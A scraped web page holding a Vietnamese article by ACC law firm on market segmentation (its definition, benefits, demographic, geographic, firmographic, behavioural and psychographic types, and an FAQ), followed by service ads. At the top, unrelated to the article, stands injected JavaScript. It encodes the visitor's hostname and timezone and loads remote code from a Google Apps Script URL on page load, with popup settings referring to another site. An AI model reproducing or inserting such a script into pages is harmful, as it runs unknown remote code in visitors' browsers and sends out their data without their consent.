var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Phân đoạn thị trường là gì? [Chi tiết 2022]

Phân đoạn thị trường là gì? Mời quý khách hàng cùng theo dõi bài viết dưới đây của công ty Luật ACC để biết thông tin cụ thể về các thắc mắc trên.

image 179
Phân đoạn thị trường là gì?

1. Phân đoạn thị trường là gì?

Phân đoạn thị trường là một thuật ngữ tiếp thị. Trong đó đề cập đến việc tập hợp những người mua tiềm năng thành các nhóm có nhu cầu chung và những người phản ứng tương tự với một hành động tiếp thị. Đây là một công cụ giúp các công ty biết được mình phải bán sản phẩm cho những ai, theo các tiêu chí nào. Các phân đoạn thị trường cho biết từng nhóm người khác nhau sẽ cảm nhận được giá trị của một số sản phẩm và dịch vụ khác nhau như thế nào.

Bằng cách hiểu các phân đoạn thị trường của mình, bạn có thể tận dụng việc nhắm mục tiêu này trong các chiến lược sản phẩm, bán hàng và tiếp thị. Phân đoạn thị trường có thể thúc đẩy chu kỳ phát triển sản phẩm của bạn bằng cách thông báo cách bạn tạo ra sản phẩm cung cấp cho các phân khúc khác nhau như nam giới so với phụ nữ hoặc thu nhập cao so với thu nhập thấp.

2. Phân đoạn thị trường có ích lợi gì?

Phân đoạn đúng thị trường, công ty của bạn sẽ có lợi thế đáng kể so với đối thủ. Bain & Company đã tiến hành nghiên cứu và kết quả là, 81% giám đốc điều hành nhận thấy rằng phân đoạn là yếu tố quan trọng để tăng lợi nhuận. Những công ty nào phân đoạn thị trường tốt hơn, lợi nhuận tuyệt vời hơn. Con số này theo Bain là cao hơn 10% so với những công ty phân đoạn kém trong khoảng thời gian 5 năm.

Ngoài ra, phân đoạn thị trường còn mang lại:

Thông điệp tiếp thị mạnh mẽ hơn: Bạn không còn phải chung chung và mơ hồ – bạn có thể nói trực tiếp với một nhóm người cụ thể những mong muốn, lợi ích, nhu cầu của họ. Thay vì “Chúng tôi mang lại lợi ích cho bạn”, bây giờ trở thành “Phát âm tiếng Anh như người bản địa cùng Elsa Speak“.

Quảng cáo đúng đối tượng đang cần: Phân đoạn thị trường giúp bạn hiểu và xác định đặc điểm của đối tượng. Thay vì trước đây bạn đốt hàng tấn tiền cho mọi đối tượng, thì nay bạn chỉ cần 1 số tiền nhỏ nhắm vào đúng mục tiêu. Điều này đặc biệt hữu ích khi bạn lựa chọn quảng cáo trên Google hoặc Facebook. Tỷ lệ phản hồi và chi phí chuyển đổi của bạn tốt hơn đáng kể.

Các chiến lược tiếp thị hiểu quả được hình thành và cải tiến: Xác định đúng mục tiêu, công ty bạn sẽ dễ dàng tạo ra các chiến lược tiếp cận cụ thể. Trong quá trình đó, những sai sót sẽ dễ tìm ra hơn. Bạn dễ dàng biết được mình đang mất khách hàng tại khâu nào trong quy trình.

Thu hút đúng khách hàng: Tương tự những thông điệp mạnh mẽ, bạn sẽ tránh tạo ra những từ ngữ chung chung. Ví dụ công ty chuyên về phát âm tiếng Anh, phân đoạn thị trường là học sinh sinh viên hoặc người đi làm. Công ty này dễ dàng tạo ra các thông điệp kiểu “Phát âm chuẩn, lương tăng nhanh” hay “Cải thiện điểm IELTS chỉ bằng phát âm chuẩn”,…

Bổ sung khách hàng trung thành cho thương hiệu của bạn: Khách hàng sẽ cảm nhận rằng họ đang được lắng nghe và thấu hiểu hơn những thương hiệu khác. Những nhu cầu, tập quán, thói quen của họ càng được tôn trọng, khả năng họ gắn bó với thương hiệu và dịch vụ của công ty càng cao hơn.

Là nhân tố mang lại sự khác biệt: Thông điệp của bạn càng cụ thể bao nhiêu, càng ấn tượng bấy nhiêu. Mà sự cụ thể ở đây được tạo ra từ cách bạn phân đoạn thị trường khách hàng tiềm năng. Nó cũng đồng nghĩa với việc bạn đang phân đoạn tốt hơn đối thủ.

Khám phá và chinh phục thị trường ngách: Phân đoạn thị trường không chỉ tối ưu nhóm khách hàng mục tiêu hiện có của bạn, mà còn mở ra những nhu cầu khách hàng mới cho bạn khám phá. Có thể bạn đang kinh doanh quần áo và mang lại doanh thu tốt. Trong quá trình phân đoạn bạn phát hiện ra có những khách hàng thuộc cộng đồng LGBT thích đến mua đồ tại cửa hàng của bạn hơn đối thủ. Bạn nhận thấy rằng thời trang mình đang kinh doanh khá là unisex và từ đó bạn có hướng phát triển thị trường ngách mới.

Tăng khả năng cập nhật thông điệp: Bằng việc phân đoạn, bạn dễ dàng nhận ra những nhóm khách hàng mang lại hiệu quả hơn những nhóm khác. Bằng cách cập nhật lại thông điệp dựa trên nhóm khách hàng hiệu quả, bạn sẽ tập trung tối đa lợi nhuận tốt hơn là bị phân tâm vào nhiều nhóm khác nhau. Từ đó tăng trưởng doanh thu dễ dàng đạt được, và lợi nhuận cũng thế.

Phát triển sản phẩm mới: Phân đoạn thị trường cũng giúp bạn review lại sản phẩm của mình đã thực sự đa dạng và phù hợp với một nhóm cụ thể nào đó chưa. Các sản phẩm sẽ được thiết kế lại cho phù hợp với những đặc điểm, nhu cầu, tính an toàn và sự tiện lợi nhất định.

3. Các hình thức phân khúc thị trường

Với phân khúc và nhắm mục tiêu, bạn muốn hiểu thị trường của mình sẽ phản ứng như thế nào trong một tình huống nhất định, chẳng hạn như mua sản phẩm của bạn. Trong nhiều trường hợp, một mô hình dự đoán có thể được đưa vào nghiên cứu để bạn có thể nhóm các cá nhân trong các phân đoạn đã xác định dựa trên các câu trả lời cụ thể cho các câu hỏi khảo sát.

3.1 Phân khúc nhân khẩu học

Phân khúc nhân khẩu học sắp xếp thị trường theo các yếu tố như tuổi tác, giáo dục, thu nhập, quy mô gia đình, chủng tộc, giới tính, nghề nghiệp và quốc tịch. Nhân khẩu học là một trong những hình thức phân khúc đơn giản và được sử dụng phổ biến nhất vì các sản phẩm và dịch vụ chúng ta mua, cách chúng ta sử dụng các sản phẩm đó và số tiền chúng ta sẵn sàng chi cho chúng thường dựa trên các yếu tố nhân khẩu học.

3.2 Phân khúc địa lý

Phân đoạn theo địa lý có thể là một tập hợp con của phân đoạn nhân khẩu học, mặc dù nó cũng có thể là một kiểu phân đoạn theo đúng nghĩa của nó. Nó tạo ra các nhóm khách hàng mục tiêu khác nhau dựa trên ranh giới địa lý. Bởi vì khách hàng tiềm năng có nhu cầu, sở thích và mối quan tâm khác nhau tùy theo khu vực địa lý của họ, việc hiểu biết về khí hậu và vùng địa lý của các nhóm khách hàng có thể giúp xác định nơi bán và quảng cáo, cũng như nơi mở rộng kinh doanh của bạn.

3.3 Phân đoạn Firmographic

Firmographic Segmentation tương tự như phân đoạn nhân khẩu học, ngoại trừ việc nhân khẩu học xem xét các cá nhân trong khi phân đoạn linh hoạt xem xét các tổ chức. Phân đoạn bằng hình ảnh sẽ xem xét những thứ như quy mô công ty, số lượng nhân viên và sẽ minh họa cách giải quyết một doanh nghiệp nhỏ sẽ khác với việc giải quyết một công ty doanh nghiệp như thế nào.

3.4 Phân đoạn hành vi

Phân khúc theo hành vi phân chia thị trường theo các hành vi và mô hình ra quyết định như mua hàng, tiêu dùng, lối sống và cách sử dụng. Ví dụ, những người mua trẻ tuổi có thể có xu hướng mua sữa tắm đóng chai, trong khi nhóm người tiêu dùng lớn tuổi có thể nghiêng về xà phòng. Việc phân đoạn thị trường dựa trên hành vi mua hàng cho phép các nhà tiếp thị phát triển một cách tiếp cận có mục tiêu hơn vì bạn có thể tập trung vào những gì bạn biết về họ và do đó có nhiều khả năng mua hơn.

3.5 Phân khúc tâm lý

Phân khúc tâm lý học xem xét các khía cạnh tâm lý của hành vi người tiêu dùng bằng cách phân chia thị trường theo lối sống, đặc điểm tính cách, giá trị, quan điểm và sở thích của người tiêu dùng. Các thị trường lớn như thị trường thể dục sử dụng phân đoạn tâm lý khi họ sắp xếp khách hàng của mình thành các nhóm người quan tâm đến cuộc sống lành mạnh và tập thể dục.

4. Những câu hỏi thường gặp

4.1 Phân đoạn thị trường tiếng Anh là gì?

Phân đoạn thị trường tiếng Anh là Market Segmentation.

4.2 Tại sao cần phải phân đoạn thị trường?

  • Xác định chiến thuật marketing hiệu quả nhất
  • Giúp thông điệp marketing mạnh mẽ hơn
  • Xây dựng quảng cáo đa mục tiêu
  • Thu hút và chuyển đổi khách hàng tiềm năng
  • Xây dựng mối quan hệ khách hàng sâu sắc hơn

4.3 Công ty Luật ACC có cung cấp dịch vụ tư vấn về phân đoạn thị trường là gì không?

Hiện là công ty luật uy tín và có các văn phòng luật sư cũng như cộng tác viên khắp các tỉnh thành trên toàn quốc, Công ty Luật ACC thực hiện việc cung cấp các dịch vụ tư vấn pháp lý cho quý khách hàng, trong đó có dịch vụ làm tư vấn về phân đoạn thị trường là gì uy tín, trọn gói cho khách hàng.

4.4 Chi phí dịch vụ tư vấn về phân đoạn thị trường là gì của công ty Luật ACC là bao nhiêu?

Công ty Luật ACC luôn báo giá trọn gói, nghĩa là không phát sinh. Luôn đảm bảo hoàn thành công việc mà khách hàng yêu cầu; cam kết hoàn tiền nếu không thực hiện đúng, đủ, chính xác như những gì đã giao kết ban đầu. Quy định rõ trong hợp đồng ký kết.

Trên đây là toàn bộ nội dung trả lời cho câu hỏi phân đoạn thị trường là gì mà chúng tôi cung cấp đến cho quý khách hàng. Nếu có bất kỳ vấn đề vướng mắc cần giải đáp cụ thể, hãy liên hệ với Công ty luật ACC để được hỗ trợ:

Hotline: 1900.3330Zalo: 0846967979Gmail: [email protected]: accgroup.vn

✅ Kiến thức:⭕ Phân đoạn thị trường là gì✅ Dịch vụ:⭐ Trọn Gói – Tận Tâm✅ Zalo:⭕ 0846967979✅ Hỗ trợ:⭐ Toàn quốc✅ Hotline:⭕ 1900.3330✅ Dịch vụ thành lập công ty⭕ ACC cung cấp dịch vụ thành lập công ty/ thành lập doanh nghiệp trọn vẹn chuyên nghiệp đến quý khách hàng toàn quốc✅ Đăng ký giấy phép kinh doanh⭐ Thủ tục bắt buộc phải thực hiện để cá nhân, tổ chức được phép tiến hành hoạt động kinh doanh của mình✅ Dịch vụ ly hôn⭕ Với nhiều năm kinh nghiệm trong lĩnh vực tư vấn ly hôn, chúng tôi tin tưởng rằng có thể hỗ trợ và giúp đỡ bạn✅ Dịch vụ kế toán⭐ Với trình độ chuyên môn rất cao về kế toán và thuế sẽ đảm bảo thực hiện báo cáo đúng quy định pháp luật✅ Dịch vụ kiểm toán⭕ Đảm bảo cung cấp chất lượng dịch vụ tốt và đưa ra những giải pháp cho doanh nghiệp để tối ưu hoạt động sản xuất kinh doanh hay các hoạt động khác✅ Dịch vụ làm hộ chiếu⭕ Giúp bạn rút ngắn thời gian nhận hộ chiếu, hỗ trợ khách hàng các dịch vụ liên quan và cam kết bảo mật thông tin